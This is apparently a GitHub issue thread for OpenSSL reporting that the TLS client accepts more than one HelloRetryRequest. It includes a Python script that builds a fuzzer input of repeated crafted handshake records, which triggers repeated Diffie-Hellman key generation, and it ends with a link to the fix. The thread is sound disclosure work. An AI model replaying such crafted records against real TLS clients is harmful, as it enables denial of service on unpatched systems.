### ISSUE TITLE
Client allows more than one HelloRetryRequest

### ISSUE THREAD

**Issue by guidovranken** [openssl/openssl#17934]
I previously reported this to the OpenSSL security address over concerns regarding execution time.

With the following Python script an input for the client fuzzer can be generated, which causes the client to invoke the Diffie-Hellman keygen many times over.

(use Python 2, not Python 3)
```python
hello = "\x16\x03\x0b\x00\x58\x02\x00\x00\x54\x03\x03\xcf\x21\xad\x74\xe5\x9a\x61\x11\xbe\x1d\x8c\x02\x1e\x65\xb8\x91\xc2\xa2\x11\x16\x7a\xbb\x8c\x5e\x07\x9e\x09\xe2\xc8\xa8\x33\x9c\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x13\x01\x00\x00\x0c\x00\x2b\x00\x02\x03\x04\x00\x33\x00\x02\x01\x03\x16\x03\x0b\x00\x58\x02\x00\x00\x54\x03\x03\xcf\x21\xad\x74\xe5\x9a\x61\x11\xbe\x1d\x8c\x02\x1e\x65\xb8\x91\xc2\xa2\x11\x16\x7a\xbb\x8c\x5e\x07\x9e\x09\xe2\xc8\xa8\x33\x9c\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x13\x01\x00\x00\x0c\x00\x2b\x00\x02\x03\x04\x00\x33\x00\x02\x01\x04"
header = "\x16\x03\x0b\x00\x58\x02\x00\x00\x54\x03\x03\xcf\x21\xad\x74\xe5\x9a\x61\x11\xbe\x1d\x8c\x02\x1e\x65\xb8\x91\xc2\xa2\x11\x16\x7a\xbb\x8c\x5e\x07\x9e\x09\xe2\xc8\xa8\x33\x9c\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x13\x01\x00\x00\x0c\x00\x2b\x00\x02\x03\x04\x00\x33\x00\x02\x01\x04\x16\x03\x0b\x00\x58\x02\x00\x00\x54\x03\x03\xcf\x21\xad\x74\xe5\x9a\x61\x11\xbe\x1d\x8c\x02\x1e\x65\xb8\x91\xc2\xa2\x11\x16\x7a\xbb\x8c\x5e\x07\x9e\x09\xe2\xc8\xa8\x33\x9c\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x13\x01\x00\x00\x0c\x00\x2b\x00\x02\x03\x04\x00\x33\x00\x02\x01\x03\x16\x03\x0b\x00\x58\x02\x00\x00\x54\x03\x03\xcf\x21\xad\x74\xe5\x9a\x61\x11\xbe\x1d\x8c\x02\x1e\x65\xb8\x91\xc2\xa2\x11\x16\x7a\xbb\x8c\x5e\x07\x9e\x09\xe2\xc8\xa8\x33\x9c\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x13\x01\x00\x00\x0c\x00\x2b\x00\x02\x03\x04\x00\x33\x00\x02\x01\x04\x16\x03\x0b\x00\x58\x02\x00\x00\x54\x03\x03\xcf\x21\xad\x74\xe5\x9a\x61\x11\xbe\x1d\x8c\x02\x1e\x65\xb8\x91\xc2\xa2\x11\x16\x7a\xbb\x8c\x5e\x07\x9e\x09\xe2\xc8\xa8\x33\x9c\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x13\x01\x00\x00\x0c\x00\x2b\x00\x02\x03\x04\x00\x33\x00\x02\x01\x03\x16\x03\x0b\x00\x58\x02\x00\x00\x54\x03\x03\xcf\x21\xad\x74\xe5\x9a\x61\x11\xbe\x1d\x8c\x02\x1e\x65\xb8\x91\xc2\xa2\x11\x16\x7a\xbb\x8c\x5e\x07\x9e\x09\xe2\xc8\xa8\x33\x9c\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x13\x01\x00\x00\x0c\x00\x2b\x00\x02\x03\x04\x00\x33\x00\x02\x01\x04\x16\x03\x0b\x00\x58\x02\x00\x00\x54\x03\x03\xcf\x21\xad\x74\xe5\x9a\x61\x11\xbe\x1d\x8c\x02\x1e\x65\xb8\x91\xc2\xa2\x11\x16\x7a\xbb\x8c\x5e\x07\x9e\x09\xe2\xc8\xa8\x33\x9c\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x13\x01\x00\x00\x0c\x00\x2b\x00\x02\x03\x04\x00\x33\x00\x02\x01\x03\x16\x03\x0b\x00\x58\x02\x00\x00\x54\x03\x03\xcf\x21\xad\x74\xe5\x9a\x61\x11\xbe\x1d\x8c\x02\x1e\x65\xb8\x91\xc2\xa2\x11\x16\x7a\xbb\x8c\x5e\x07\x9e\x09\xe2\xc8\xa8\x33\x9c\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x13\x01\x00\x00\x0c\x00\x2b\x00\x02\x03\x04\x00\x33\x00\x02\x01\x04"

out = header
for i in range(1000):
    out += hello
with open('x.bin', 'wb') as fp:
    fp.write(out)
```

I was informed by @davidben that the actual bug here is the fact that the client is responding to more than 1 HelloRetryRequest from the server.

I think it's this:

https://datatracker.ietf.org/doc/html/rfc8446#section-4.1.4:

```
If a client receives a second
HelloRetryRequest in the same connection (i.e., where the ClientHello
was itself in response to a HelloRetryRequest), it MUST abort the
handshake with an "unexpected_message" alert
```

**Comment by t8m** [comment]
Fix in  #17936

**Comment by guidovranken** [comment]
Thanks. Looks fixed. At least I cannot reproduce the long execution time with my input anymore.
